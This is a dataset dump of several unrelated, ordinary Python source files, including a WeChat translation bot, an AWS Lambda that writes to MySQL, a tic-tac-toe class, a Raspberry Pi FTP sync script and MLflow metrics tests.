= urllib.unquote(xml)\n content=xml.find(\"Content\").text\n mstype=xml.find(\"MsgType\").text \n fromUser=xml.find(\"FromUserName\").text\n toUser=xml.find(\"ToUserName\").text\n mc = pylibmc.Client() #初始化一个memcache实例用来保存用户的操作\n \n \n \n #下面创建一个欢迎消息,通过判断Event类型\n if mstype == \"event\":\n mscontent = xml.find(\"Event\").text\n if mscontent == \"subscribe\":\n replayText = u'''欢迎关注本微信,这个微信是本人业余爱好所建立,也是想一边学习Python一边玩的东西,\n 现在还没有什么功能,只是弄了个翻译与豆瓣图书查询的小工具,你们有什么好的文章也欢迎反馈给我,我会不定期的分享给大家,输入help查看操作指令'''\n return self.render.reply_text(fromUser,toUser,int(time.time()),replayText)\n if mscontent == \"unsubscribe\":\n replayText = u'我现在功能还很简单,知道满足不了您的需求,但是我会慢慢改进,欢迎您以后再来' \n return self.render.reply_text(fromUser,toUser,int(time.time()),replayText)\n if mstype == 'text':\n content=xml.find(\"Content\").text\n \n if content.lower() == 'bye':\n mc.delete(fromUser+'_xhj')\n return self.render.reply_text(fromUser,toUser,int(time.time()),u'您已经跳出了和小黄鸡的交谈中,输入help来显示操作指令')\n if content.lower() == 'xhj':\n mc.set(fromUser+'_xhj','xhj')\n return self.render.reply_text(fromUser,toUser,int(time.time()),u'您已经进入与小黄鸡的交谈中,请尽情的蹂躏它吧!输入bye跳出与小黄鸡的交谈')\n if content.lower() == 'm':\n musicList = [\n [r'http://bcs.duapp.com/yangyanxingblog3/music/destiny.mp3','Destiny',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/5days.mp3','5 Days',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/Far%20Away%20%28Album%20Version%29.mp3','Far Away (Album Version)',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E5%B0%91%E5%B9%B4%E6%B8%B8.mp3',u'少年游',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E8%8F%8A.mp3',u'菊--关喆',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E7%A6%BB%E4%B8%8D%E5%BC%80%E4%BD%A0.mp3',u'离不开你',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E9%99%8C%E7%94%9F%E4%BA%BA.mp3',u'陌生人',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E8%8A%B1%E5%AE%B9%E7%98%A6.mp3',u'花容瘦',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/%E4%B9%98%E5%AE%A2.mp3',u'乘客',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/If%20My%20Heart%20Was%20A%20House.mp3',u'If My Heart Was A House',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/Hello%20Seattle%EF%BC%88Remix%E7%89%88%EF%BC%89.mp3',u'Hello Seattle(Remix版',u'献给我的宝贝晶晶'],\n [r'http://bcs.duapp.com/yangyanxingblog3/music/Everybody%20Hurts.mp3',u'Everybody Hurts',u'献给我的宝贝晶晶'] \n ]\n music = random.choice(musicList)\n musicurl = music[0]\n musictitle = music[1]\n musicdes =music[2]\n return self.render.reply_music(fromUser,toUser,int(time.time()),musictitle,musicdes,musicurl)\n \n #读取memcache中的缓存数据\n \n mcxhj = mc.get(fromUser+'_xhj')\n \n if mcxhj =='xhj':\n res = xiaohuangji(content)\n reply_text = res['sentence_resp']\n if u'微信' in reply_text or u'微 信' in reply_text:\n reply_text = u\"小黄鸡脑袋出问题了,请换个问题吧~\"\n return self.render.reply_text(fromUser,toUser,int(time.time()),reply_text) \n \n if content == 'help':\n replayText = u'''1.输入中文或者英文返回对应的英中翻译\n2.输入m随机听一首音乐\n3.输入xhj进入调戏小黄鸡模式'''\n return self.render.reply_text(fromUser,toUser,int(time.time()),replayText)\n elif type(content).__name__ == \"unicode\":\n content = content.encode('UTF-8')\n Nword = youdao(content) \n return self.render.reply_text(fromUser,toUser,int(time.time()),Nword)\n \ndef youdao(word):\n qword = urllib2.quote(word)\n baseurl = r'http://fanyi.youdao.com/openapi.do?keyfrom=yyxweixintranslate&key=1581042900&type=data&doctype=json&version=1.1&q='\n url = baseurl+qword\n resp = urllib2.urlopen(url)\n fanyi = json.loads(resp.read())\n if fanyi['errorCode'] == 0: \n if 'basic' in fanyi.keys():\n trans = u'%s:\\n%s\\n%s\\n网络释义:\\n%s'%(fanyi['query'],''.join(fanyi['translation']),' '.join(fanyi['basic']['explains']),'\\n'.join(fanyi['web'][0]['value']))\n return trans\n else:\n trans = u'%s:\\n基本翻译:%s\\n'%(fanyi['query'],''.join(fanyi['translation'])) \n return trans\n elif fanyi['errorCode'] == 20:\n return u'对不起,要翻译的文本过长'\n elif fanyi['errorCode'] == 30:\n return u'对不起,无法进行有效的翻译'\n elif fanyi['errorCode'] == 40:\n return u'对不起,不支持的语言类型'\n else:\n return u'对不起,您输入的单词%s无法翻译,请检查拼写'% word\n \ndef xiaohuangji(ask):\n ask = ask.encode('UTF-8')\n enask = urllib2.quote(ask)\n send_headers = {\n 'Cookie':''\n }\n baseurl = r'http://www.simsimi.com/func/reqN?lc=zh&ft=0.0&req='\n url = baseurl+enask\n req = urllib2.Request(url,headers=send_headers)\n resp = urllib2.urlopen(req)\n reson = json.loads(resp.read())\n return reson","sub_path":"work for 2015-2016/py2/shijian-2016/新建文件夹/weix2.py","file_name":"weix2.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"604603677","text":"import yaml\nimport os\n\ncurrent_path = os.path.abspath(os.path.dirname(__file__))\ndefault_conf=current_path + '/../config/merge_handle_rule.yaml'\n\ndef ReadYaml(configPath,root=None):\n\n print(\"get configPath: \"+configPath)\n\n if configPath == None:\n configfile = default_conf\n\n with open(configPath, 'r',encoding='utf8') as f:\n yaml_config = yaml.load(f.read())\n\n if root==None:\n resp = yaml_config\n else:\n resp= yaml_config[root]\n\n return resp\n","sub_path":"common_utils/configHandler.py","file_name":"configHandler.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"471756525","text":"import os, sys, logging\nimport pymysql.cursors\n\nlogger = logging.getLogger()\ndef get_db_connection():\n try:\n return pymysql.connect(os.environ[\"DB_HOST\"],\n user=os.environ[\"DB_USER\"],\n passwd=os.environ[\"DB_PASSWORD\"],\n db=os.environ[\"DB_NAME\"],\n connect_timeout=5)\n except pymysql.MySQLError as e:\n logger.error(\"ERROR: Unexpected error: Could not connect to MySQL instance.\")\n logger.error(e)\n sys.exit() \n\n\ndef lambda_handler(event, context):\n connection = get_db_connection()\n try:\n with connection.cursor() as cursor:\n for event in event[\"Records\"]:\n sql = \"INSERT INTO `files` (`bucket`, `bucket_key`) VALUES (%s, %s)\"\n cursor.execute(sql, (event[\"s3\"][\"bucket\"][\"name\"], event[\"s3\"][\"object\"][\"key\"]))\n connection.commit()\n print(\"Exceuction completed!!!\")\n logger.info(\"Successful!!!\")\n finally:\n connection.close()\n\n\n\n","sub_path":"aws/lambda/python-rds/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"616883214","text":"from sympy import *\n\nx = Symbol('x')\ny = Symbol('y')\n\nxlist = [0, 0.5, 1, 2]\nylist = [0, y, 3, 2]\n\ndef neville(xlist, ylist, point):\n top = 1\n bottom = 1\n L_coef = []\n\n for x_1 in xlist:\n for x_2 in xlist:\n if x_1 != x_2:\n top *= (x - x_2)\n bottom *= (x_1 - x_2)\n L_coef.append(top/bottom)\n \n equation = 0\n for idx in range(len(ylist)):\n equation += L_coef[idx]*ylist[idx]\n\n estimate_poly = equation.subs({x : point})\n return solve(estimate_poly)","sub_path":"neville_method.py","file_name":"neville_method.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"101371014","text":"import _plotly_utils.basevalidators\n\n\nclass LeafValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"leaf\", parent_name=\"icicle\", **kwargs):\n super(LeafValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Leaf\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n opacity\n Sets the opacity of the leaves. With colorscale\n it is defaulted to 1; otherwise it is defaulted\n to 0.7\n\"\"\",\n ),\n **kwargs,\n )\n","sub_path":"packages/python/plotly/plotly/validators/icicle/_leaf.py","file_name":"_leaf.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"374578308","text":"from typing import Dict\nfrom cloudrail.knowledge.context.aws.resources.athena.athena_workgroup import AthenaWorkgroup\nfrom cloudrail.knowledge.context.aws.cloudformation.cloudformation_constants import CloudformationResourceType\nfrom cloudrail.knowledge.context.aws.resources_builders.cloudformation.base_cloudformation_builder import BaseCloudformationBuilder\n\n\nclass CloudformationAthenaWorkgroupBuilder(BaseCloudformationBuilder):\n\n def __init__(self, cfn_by_type_map: Dict[CloudformationResourceType, Dict[str, Dict]]) -> None:\n super().__init__(CloudformationResourceType.ATHENA_WORKGROUP, cfn_by_type_map)\n\n def parse_resource(self, cfn_res_attr: dict) -> AthenaWorkgroup:\n properties: dict = cfn_res_attr['Properties']\n workgroup_configuration = properties.get('WorkGroupConfiguration', {})\n result_configuration = workgroup_configuration.get('ResultConfiguration', {})\n encryption_config = result_configuration.get('EncryptionConfiguration', {})\n encryption_option = self.get_property(encryption_config, 'EncryptionOption')\n kms_key_id: str = self.get_property(encryption_config, 'KmsKey')\n\n return AthenaWorkgroup(self.get_property(properties, 'Name'),\n self.get_property(properties, 'State', 'ENABLED'),\n encryption_config,\n self.get_property(workgroup_configuration, 'EnforceWorkGroupConfiguration', False),\n encryption_option,\n None,\n cfn_res_attr['region'],\n cfn_res_attr['account_id'],\n kms_key_id)\n","sub_path":"cloudrail/knowledge/context/aws/resources_builders/cloudformation/athena/cloudformation_athena_workgroup_builder.py","file_name":"cloudformation_athena_workgroup_builder.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"530327673","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLucas Fontenla & Victor Hugo - Engenharia 1B\nEP3_JogoDaVelha\n\"\"\"\n#NOTAS\n#começa com X\nimport numpy as np #importa numpy para gerar a matrizes\n\nclass Jogo:\n\tdef __init__(self):\n\t\t#jogadores\n\t\tself.jogador1 = str()\n\t\tself.vitorias_jogador1 = int()\n\t\tself.jogador2 = str()\n\t\tself.vitorias_jogador2 = int()\n\t\t#contador de número de partidas\n\t\tself.contador = int()\n\t\tself.contador_max = int()\n\t\t#mostra vencedor dos dois modos\n\t\tself.vencedor = str()\n\t\tself.vencedor_melhor3 = str()\n\n\t\tself.modo_jogo = int()\n\n\t\tself.tabuleiro_virtual = np.zeros([3,3]) #gera o tabuleiro como uma matriz 3x3 de zeros\n\n\t\tself.jogada = \"X\" #define a primeira jogada como \"X\"\n\t\tself.proxima_jogada = \"O\"\n\n\tdef recebe_jogadores(self, jogador1, jogador2):\n\t\tself.jogador1 = \"{0}\".format(jogador1) #X\n\t\tself.jogador2 = \"{0}\".format(jogador2) #O\n\n\tdef registra_modo(self, modo):\n\t\tself.modo_jogo = modo\n\n\tdef recebe_jogada(self, posicao_jogada_tupla): #função que recebe a jogada do tabuleiro\n\t\t\n\t\tself.registra_jogada(posicao_jogada_tupla) #chama a função registra jogada para ser registrada na matriz\n\n\t\tif self.jogada == \"X\": #sempre que o númeoro for par, escreve \"X\"\n\t\t\tself.proxima_jogada = \"O\"\n\n\t\telif self.jogada == \"O\":\n\t\t\tself.proxima_jogada = \"X\"\n\n\tdef registra_jogada(self, posicao_jogada_tupla): #função responsável por registrar a jogada na matriz\n\t\tif self.jogada == \"X\":\n\t\t\tvalor = 1\n\t\telif self.jogada == \"O\":\n\t\t\tvalor = 2\n\n\t\tself.tabuleiro_virtual[posicao_jogada_tupla[0]][posicao_jogada_tupla[1]] = valor\n\n\t\tself.jogada = self.proxima_jogada\n\n\t#função que verifica se há ganhador\t\n\t#a função multiplica os valores das linhas, colunas e diagonais. Como X = 1, se \"X\" ganhar, a multiplicação da linha é 1\n\t#o mesmo para \"O\", só que como seu valor é 2, a multiplicação será 8. Espaços vazios são 0, desse modo qualquer multiplicação\n\t#com resultado 0 significa que o jogo ainda não acabou pois há espaço livre. Se nem 0, nem 1, nem 8 for encontrado, houve empate.\n\tdef verifica_ganhador(self):\n\t\tvalores_resultados = list()\n\n\t\tadd_valor_diagonal1 = 1\n\t\tadd_valor_diagonal2 = 1\n\n\t\tfor i in range(0, 3):\n\t\t\tadd_valor_linhas = 1\n\t\t\tadd_valor_colunas = 1\n\n\t\t\tfor j in range(0, 3):\n\t\t\t\tadd_valor_linhas *= self.tabuleiro_virtual[i][j]\n\t\t\t\tadd_valor_colunas *= self.tabuleiro_virtual[j][i]\n\t\t\t\t\n\t\t\tadd_valor_diagonal1 *= self.tabuleiro_virtual[i][i]\n\t\t\tadd_valor_diagonal2 *= self.tabuleiro_virtual[i][(i*(-1)-1)]\n\n\t\t\tvalores_resultados.append(add_valor_linhas)\n\t\t\tvalores_resultados.append(add_valor_colunas)\n\n\t\tvalores_resultados.append(add_valor_diagonal1)\n\t\tvalores_resultados.append(add_valor_diagonal2)\n\n\t\tif valores_resultados.count(1) > 0:\n\t\t\tself.contador += 1\n\t\t\tself.vencedor = \"X\"\n\t\t\tself.vitorias_jogador1 += 1\n\t\t\treturn 1\n\t\telif valores_resultados.count(8) > 0:\n\t\t\tself.contador += 1\n\t\t\tself.vencedor = \"O\"\n\t\t\tself.vitorias_jogador2 += 1\n\t\t\treturn 2\t\n\t\telif valores_resultados.count(0) > 0:\n\t\t\treturn -1\n\t\telse:\n\t\t\tself.vencedor = 0\n\t\t\tself.contador += 1\n\t\t\treturn 0\n\n\tdef limpa_jogadas(self): #Função que reseta todo o tabuleiro\n\t\tif self.vencedor == \"X\":\n\t\t\tself.jogada = \"X\"\n\t\t\tself.proxima_jogada = \"O\"\n\n\t\telif self.vencedor == \"O\":\n\t\t\tself.jogada = \"O\"\n\t\t\tself.proxima_jogada = \"X\"\n\n\t\telif self.vencedor == -1: \n\t\t\tself.jogada = self.proxima_jogada\n\t\t\tif self.jogada == \"X\":\n\t\t\t\tself.proxima_jogada = \"O\"\n\t\t\telse:\n\t\t\t\tself.proxima_jogada = \"X\"\n\n\t\tself.tabuleiro_virtual = np.zeros([3,3])\n\n\tdef verifica_modo(self):\n\t\tcontador_max = 3\n\n\t\tif self.vitorias_jogador1 > self.vitorias_jogador2:\n\t\t\tself.vencedor_melhor3 = \"Vencedor(a) {0}\".format(self.jogador1)\n\t\telif self.vitorias_jogador1 < self.vitorias_jogador2:\n\t\t\tself.vencedor_melhor3 = \"Vencedor(a) {0}\".format(self.jogador2)\n\t\telse:\n\t\t\tself.vencedor_melhor3 = \"Empate\"\n\n\t\tif self.modo_jogo == 1:\n\t\t\tif self.vitorias_jogador1 == 2 or self.vitorias_jogador2 == 2 and self.contador == 2:\n\t\t\t\tself.contador = 0\n\t\t\t\tself.vitorias_jogador1 = self.vitorias_jogador2 = 0\n\t\t\t\treturn -1\n\t\t\telif self.contador == contador_max:\n\t\t\t\tself.contador = 0\n\t\t\t\tself.vitorias_jogador1 = self.vitorias_jogador2 = 0\n\t\t\t\treturn -1\n\t\t\telse:\n\t\t\t\treturn 1\n\n\t\treturn 0","sub_path":"Desenvolvimentos extras/Jogo_da_Velha_extra_por_Lucas_Fontenla.py","file_name":"Jogo_da_Velha_extra_por_Lucas_Fontenla.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"103639252","text":"#Importing Adafruit_CharLCD library and Configuring LCD\nimport Adafruit_CharLCD as LCD\nlcd = LCD.Adafruit_CharLCD(27,22,25,24,23,18,16,2,4)\n\n#Importing other things like FTP and datetime tags\nimport ftplib\nfrom datetime import datetime\nimport sys, time, json, os, os.path\n\n#Loading config.json file\nif (os.path.isfile('config.json') == True):\n cfgfile = open('config.json','r')\n config = json.load(cfgfile)\n cfgfile.close()\nelse: #If there is no config, ask for info\n server = raw_input(\"Server ip: \")\n username = raw_input(\"Username: \")\n password = raw_input(\"Password: \")\n directory = raw_input(\"Directory: \")\n debug = raw_input(\"Debug Output(y/n)?:\")\n config = {'server':server,\n 'username':username,\n 'password':password,\n 'directory':directory,\n 'debug':debug}\n cfgfile = open('config.json','w')\n json.dump(config,cfgfile)\n cfgfile.close()\n\n#Functions:\ndef genFileCache():\n cache = list(os.listdir(config['directory']))\n return cache\n\ndef debug(text):\n if (config['debug'] == 'y'):\n print(text)\n\ndef disp(text, delay=None):\n lcd.clear()\n lcd.message(text)\n if (delay != None):\n time.sleep(delay)\n\ndef status(message):\n lcd.clear()\n lcd.message(\" \" + datetime.now().strftime('%b %d %H:%M') + \"\\n\" + message)\n\n\n#Declaring FTP\nftp = ftplib.FTP(config['server'])\n\ntry:\n ftp.login(config['username'],config['password'])\n debug(\"Login Successful to \" + config['server'])\n disp(\"Connected to:\\n\" + config['server'],1)\nexcept ftplib.all_errors:\n debug(\"Cannot connect to \" + config['server'])\n disp(\"Connection Error\\n\" + config['server'],1)\n status(\"Connection Error\")\n sys.exit()\n\nlocalfiles = list(genFileCache()) #Declares localfiles as filelist \nremotefiles = ftp.nlst() #Getting filelist from server \n#Checking what server has more than local, and queuing to download\ndownloadList = list(set(remotefiles) - set(localfiles))\n\nif (len(downloadList) == 0):\n debug(\"All files up to date, exiting...\")\n disp(\"All files are\\nup to date!\",2)\n status(\" All Synced\")\n sys.exit()\n\nitemCount = len(downloadList) #Total number of items to be downloaded\nconnFailCount = 0 #Will be used in except block to not continiously try\n #connecting to server\n\nlcd.blink(True) #To show activity\nfor i in range(itemCount):\n try:\n fileName = downloadList[i]\n currentCount = i + 1 #i will start with 0, so this is for humans.\n debug(str(currentCount) + \"/\" + str(itemCount) + \" Downloading \" + fileName)\n disp(str(currentCount)+\"/\"+str(itemCount)+'\\nDownloading ')\n ftp.retrbinary('RETR ' + fileName, open(config['directory'] + fileName,'wb').write)\n except:\n disp(\" DOWNLOAD\\n FAILED\",2)\n if connFailCount >= 3:\n break\n else:\n connFailCount += 1\n\nlcd.blink(False)\ndisp(\" Syncing...\")\nlocalfiles = list(genFileCache())\ndownloadList = list(set(remotefiles) - set(localfiles))\nif (connFailCount >= 3):\n disp(\" Connection\\n Failed\")\n status(\" Conn. Failed\")\nelif (len(downloadList) > 0):\n disp(str(len(downloadList)) + \" FILES\\n NOT DOWNLOADED\",3)\n status(\" Some Issues...\")\nelif (len(downloadList) == 0):\n status(\" All Synced\")\nelse:\n status(\" Unknown Issue?\")","sub_path":"PiFtp2.py","file_name":"PiFtp2.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"305742847","text":"\"\"\"Tests src/common/metrics.py\"\"\"\nimport os\nimport pytest\nfrom unittest.mock import Mock, patch\nimport time\nimport platform\n\nfrom common.metrics import MetricsLogger\n\n@patch('mlflow.start_run')\ndef test_unique_mlflow_initialization(mlflow_start_run_mock):\n \"\"\" Tests MetricsLogger() unique initialization of mlflow\"\"\"\n metrics_logger = MetricsLogger()\n metrics_logger_2 = MetricsLogger()\n mlflow_start_run_mock.assert_called_once()\n\n\n@patch('mlflow.log_metric')\ndef test_metrics_logger_log_metric(mlflow_log_metric_mock):\n \"\"\" Tests MetricsLogger().log_metric() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.log_metric(\"foo\", \"bar\")\n mlflow_log_metric_mock.assert_called_with(\n \"foo\", \"bar\"\n )\n\n\n@patch('mlflow.log_metric')\ndef test_metrics_logger_log_metric_too_long(mlflow_log_metric_mock):\n \"\"\" Tests MetricsLogger().log_metric() \"\"\"\n metrics_logger = MetricsLogger()\n\n metric_key = \"x\" * 250\n assert len(metric_key), 250\n\n short_metric_key = \"x\" * 50\n assert len(short_metric_key), 50\n\n metrics_logger.log_metric(\n metric_key, \"bar\"\n )\n mlflow_log_metric_mock.assert_called_with(\n short_metric_key, \"bar\"\n )\n\n\n@patch('mlflow.set_tags')\ndef test_metrics_logger_set_properties(mlflow_set_tags_mock):\n \"\"\" Tests MetricsLogger().set_properties() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.set_properties(\n key1 = \"foo\",\n key2 = 0.45\n )\n mlflow_set_tags_mock.assert_called_with(\n { 'key1' : \"foo\", 'key2' : 0.45 }\n )\n\n\n@patch('mlflow.set_tags')\ndef test_metrics_logger_set_platform_properties(mlflow_set_tags_mock):\n \"\"\" Tests MetricsLogger().set_properties() \"\"\"\n metrics_logger = MetricsLogger()\n\n platform_properties = {\n \"machine\":platform.machine(),\n \"processor\":platform.processor(),\n \"system\":platform.system(),\n \"system_version\":platform.version(),\n \"cpu_count\":os.cpu_count()\n }\n metrics_logger.set_platform_properties()\n\n mlflow_set_tags_mock.assert_called_with(\n platform_properties\n )\n\n@patch('mlflow.set_tags')\ndef test_metrics_logger_set_properties_from_json(mlflow_set_tags_mock):\n \"\"\" Tests MetricsLogger().set_properties_from_json() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.set_properties_from_json(\n \"{ \\\"key1\\\" : \\\"foo\\\", \\\"key2\\\" : 0.45 }\"\n )\n mlflow_set_tags_mock.assert_called_with(\n { 'key1' : \"foo\", 'key2' : '0.45' }\n )\n\n # test failure during json parsing\n with pytest.raises(ValueError) as exc_info:\n metrics_logger.set_properties_from_json(\n \"{ 'foo': NOTHING }\"\n )\n # making sure it's the right exception\n assert str(exc_info.value).startswith(\"During parsing of JSON properties\")\n\n # test failure if dict is not provided\n with pytest.raises(ValueError) as exc_info:\n metrics_logger.set_properties_from_json(\n \"[\\\"bla\\\", \\\"foo\\\"]\"\n )\n # making sure it's the right exception\n assert str(exc_info.value).startswith(\"Provided JSON properties should be a dict\")\n\n@patch('mlflow.log_params')\ndef test_metrics_logger_log_parameters(mlflow_log_params_mock):\n \"\"\" Tests MetricsLogger().log_parameters() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.log_parameters(\n key1 = \"foo\",\n key2 = 0.45\n )\n mlflow_log_params_mock.assert_called_with(\n { 'key1' : \"foo\", 'key2' : 0.45 }\n )\n\n\n@patch('mlflow.log_metric')\ndef test_metrics_logger_log_time_block(mlflow_log_metric_mock):\n \"\"\" Tests MetricsLogger().log_time_block() \"\"\"\n metrics_logger = MetricsLogger()\n\n with metrics_logger.log_time_block(\"foo_metric\"):\n time.sleep(0.01)\n\n mlflow_log_metric_mock.assert_called_once()\n","sub_path":"tests/common/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440017891","text":"import xlwt\nimport pymssql\nfrom test.读取花名册excel数据 import renyuan\n\n\nclass MSSQL:\n def __init__(self,host,user,pwd,db):\n self.host=host\n self.user=user\n self.pwd=pwd\n self.db=db\n\n def GetConnect(self):\n if not self.db:\n raise(NameError,'没有目标数据库')\n self.connect=pymssql.connect(host=self.host,user=self.user,password=self.pwd,database=self.db,charset='utf8')\n cur=self.connect.cursor()\n if not cur:\n raise(NameError,'数据库访问失败')\n else:\n return cur\n\n def ExecSql(self,sql,para):#带变量的sql语句\n cur=self.GetConnect()\n cur.execute(sql,para)\n self.connect.commit()\n self.connect.close()\n\n def ExecQuery(self,sql):\n cur= self.GetConnect()\n cur.execute(sql)\n resList = cur.fetchall()\n self.connect.close()\n return resList\n\n\ndef main():\n ms = MSSQL(host=\"192.168.10.77\", user=\"sa\", pwd=\"sa\", db=\"STCard_Enp\")\n resList = ms.ExecQuery(\"select *from ST_Person where Person_Name <>'外来' and Is_Del <>1 and Dept_ID <>9 and Dept_ID <>3 \"\n \"and Dept_ID <>7 and Dept_ID <>8 and Card_No <>''\")\n k = 0\n path = r\"D:\\非在职人员名单.xls\"\n workbook = xlwt.Workbook() # 新建一个工作簿\n sheet = workbook.add_sheet(\"非在职人员名单\") # 在工作簿中新建一个表格\n for i in range(0,len(resList)):\n if resList[i][4] not in renyuan():\n x=resList[i][4]\n # ms.ExecSql(\"update ST_person set is_del=1 where person_name =%s and Is_Del <>1 and Dept_ID <>9 and Dept_ID <>3 \"\n # \"and Dept_ID <>7 and Dept_ID <>8 and Card_No <>''\",x)\n #清理姓名时去掉注销\n print(resList[i][4])\n sheet.write(k, 0, resList[i][4]) # 像表格中写入数据(对应的行和列)\n k=k+1\n workbook.save(path) # 保存工作簿\n print(\"xls格式表格写入数据成功!\")\n\n\nif __name__ == '__main__':\n main()\n input(\"执行完成................!\")\n","sub_path":"test/MSSQL_Connect.py","file_name":"MSSQL_Connect.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"180881658","text":"def solve(nm_set):\n for i in range(len(nm_set)):\n n = int(nm_set[i][0])\n m = int(nm_set[i][1])\n cnt = 0\n\n for num in range(n, m + 1):\n cnt += str(num).count('0')\n\n print(cnt)\n\n\n\nif __name__ == '__main__':\n t = int(input())\n input_set = list()\n for i in range(t):\n input_set.append(input().split())\n\n solve(input_set)","sub_path":"박민/[20.09.10]11170.py","file_name":"[20.09.10]11170.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"64006747","text":"import json, sys, subprocess, os, argparse, logging\nfrom collections import deque\nimport numpy as np\nfrom noodle.scorematrix import ScoreMatrixReader\nfrom noodle.evaluation import get_precision_recall\n\ndef parse_output(matrix, runfile, threshold, mask):\n with open(runfile) as f:\n results = json.load(f)\n ps, rs, ts = deque([]), deque([]), deque([])\n names = np.array(matrix.get_attr_names())[mask]\n for q, r in results.items():\n runtime = r['runtime']\n result = r['results']\n scores = matrix.get_scores(q)[mask]\n ref = names[scores >= threshold]\n precision, recall = get_precision_recall(result, ref)\n ps.append(precision)\n rs.append(recall)\n ts.append(runtime) \n return list(ps), list(rs), list(ts) \n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--matrix-dir\", type=str,\n default=\"_matrix\")\n parser.add_argument(\"-a\", \"--index-attr\", type=str,\n default=\"_index_attrs_10_9999999.json\")\n parser.add_argument(\"-i\", \"--result-dir\", type=str)\n args = parser.parse_args(sys.argv[1:])\n\n matrix = ScoreMatrixReader(args.matrix_dir, cache_size=1000)\n index_attrs = set(json.load(open(args.index_attr)))\n mask = np.array([i in index_attrs for i in matrix.get_attr_names()])\n\n results = {}\n for f in os.listdir(args.result_dir):\n t = float(os.path.splitext(f)[0])\n results[t] = os.path.join(args.result_dir, f)\n \n precisions = []\n recalls = []\n runtimes = []\n thresholds = sorted(results.keys())\n for t in thresholds:\n ps, rs, ts = parse_output(matrix, results[t], t, mask)\n precisions.append(np.mean(ps))\n recalls.append(np.mean(rs))\n runtimes.append(np.mean(ts))\n\n import matplotlib\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\n #plt.style.use(\"/home/ekzhu/noodle/acm-2col.mplstyle\")\n # Plot precision vs recalls\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n axes[0].plot(thresholds, precisions, marker=\"+\")\n axes[1].plot(thresholds, recalls, marker=\"+\")\n # Labels\n axes[0].set_ylabel(\"Precision\")\n axes[1].set_ylabel(\"Recall\")\n for ax in axes:\n ax.set_xlim(0,1)\n ax.set_ylim(0,1)\n ax.grid()\n ax.set_xlabel(\"Containment Threshold\")\n# box = ax.get_position()\n# ax.set_position([box.x0, box.y0 + box.height * 0.15, \n# box.width, box.height * 0.85])\n fig.savefig(\"linearscan.png\")\n plt.close()\n # Plot runtime\n fig, axes = plt.subplots(1, 1)\n axes.plot(thresholds, runtimes, marker=\"+\")\n axes.set_ylabel(\"Runtime (ms)\")\n axes.set_xlabel(\"Containment Threshold\")\n axes.set_ylim(ymin=0)\n axes.grid()\n fig.savefig(\"linearscan_runtime.png\")\n plt.close()\n","sub_path":"linearscan.py","file_name":"linearscan.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"622948560","text":"# Copyright (C) 2013 Google Inc., authors, and contributors \n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n# Created By:\n# Maintained By: vraj@reciprocitylabs.com\n\nfrom ggrc import db\nfrom .mixins import deferred, Base\n\nclass PbcList(Base, db.Model):\n __tablename__ = 'pbc_lists'\n\n audit_cycle_id = deferred(\n db.Column(db.Integer, db.ForeignKey('cycles.id'), nullable=False),\n 'PbcList')\n\n requests = db.relationship(\n 'Request', backref='pbc_list', cascade='all, delete-orphan')\n control_assessments = db.relationship(\n 'ControlAssessment', backref='pbc_list', cascade='all, delete-orphan')\n\n _publish_attrs = [\n 'audit_cycle',\n 'requests',\n 'control_assessments',\n ]\n\n 